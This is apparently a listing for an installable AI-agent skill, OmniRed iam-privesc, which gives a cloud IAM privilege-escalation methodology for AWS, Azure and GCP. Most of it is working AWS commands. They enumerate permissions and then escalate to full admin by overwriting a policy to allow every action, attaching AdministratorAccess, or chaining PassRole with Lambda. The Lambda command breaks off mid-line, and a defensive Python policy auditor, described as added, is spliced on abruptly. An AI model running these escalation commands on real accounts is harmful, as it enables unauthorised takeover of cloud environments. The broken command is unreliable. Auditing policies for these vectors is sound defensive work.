
iam-privesc

Cloud IAM privilege escalation methodology for AWS, Azure, and GCP. Covers misconfigured roles, policy enumeration, assume-role chaining, and escalation to admin/root equivalent access.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63
Install: claude install-skill sunilgentyala/OmniRed
# Cloud IAM Privilege Escalation

## Attack Surface

IAM misconfigurations that allow escalation: overly permissive roles, writable policy attachments, unintended trust relationships, wildcard permissions, privilege escalation via service accounts, and Lambda/EC2 metadata credential exposure.

## Methodology — AWS

### Phase 1 — Enumerate current permissions

```bash
# Current identity
aws sts get-caller-identity

# Enumerate attached policies
aws iam list-attached-user-policies --user-name <username>
aws iam list-user-policies --user-name <username>
aws iam list-groups-for-user --user-name <username>

# Get policy document (find escalation vectors)
aws iam get-policy-version --policy-arn <arn> --version-id v1

# Automated enumeration
python3 enumerate-iam.py --access-key <key> --secret-key <secret>
```

### Phase 2 — Key escalation vectors (AWS)

**iam:CreatePolicyVersion** (overwrite existing policy):

```bash
aws iam create-policy-version --policy-arn <arn> \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' \
  --set-as-default
```

**iam:AttachUserPolicy** (attach AdministratorAccess):

```bash
aws iam attach-user-policy --user-name <username> \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
```

**iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction:**

```bash
# Create Lambda with a high-privilege role and invoke it to escalate
aws lambda create-function --function-name priv-esc \
  --runtime py
```
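The Phase 2 vectors above are also what a defender should look for when reviewing policy documents returned by `aws iam get-policy-version`. The following audit helper is an added example, not part of the OmniRed skill: it takes an IAM policy document and reports which of the listed vectors it fully grants, handling the wildcard and `NotAction` forms IAM permits. The sample policy and its role ARN are constructed for illustration.

```python
import fnmatch
import json

# Escalation vectors from Phase 2 above, as (label, actions that must ALL be granted).
ESCALATION_VECTORS = [
    ("iam:CreatePolicyVersion (overwrite existing policy)", {"iam:CreatePolicyVersion"}),
    ("iam:AttachUserPolicy (attach AdministratorAccess)", {"iam:AttachUserPolicy"}),
    ("iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction",
     {"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"}),
]


def _as_list(value):
    """IAM accepts a bare string or a list for Statement, Action and NotAction."""
    return [] if value is None else (value if isinstance(value, list) else [value])


def _matches(action, patterns):
    # IAM action matching is case-insensitive and supports * and ? wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in _as_list(patterns))


def grants(policy, action):
    """True if some Allow statement grants `action`. Resource/Condition scoping and explicit
    Deny statements are ignored, so the audit over-approximates (the safe side for review)."""
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt:
            # Allow + NotAction grants everything that is NOT listed.
            if not _matches(action, stmt["NotAction"]):
                return True
        elif _matches(action, stmt.get("Action")):
            return True
    return False


def find_escalation_vectors(policy_document):
    """Return the labels of vectors whose required actions are all granted by the document."""
    policy = json.loads(policy_document) if isinstance(policy_document, str) else policy_document
    return [label for label, needed in ESCALATION_VECTORS
            if all(grants(policy, a) for a in needed)]


# Constructed sample: a "developer" policy whose lambda:* plus a scoped PassRole completes vector 3.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/lambda-exec"},
    ],
})

if __name__ == "__main__":
    for label in find_escalation_vectors(SAMPLE_POLICY):
        print("escalation vector granted:", label)
```

A hit means the reviewed principal should be scoped down or the role it can pass should be restricted with a `Resource` and `iam:PassedToService` condition before the finding is closed.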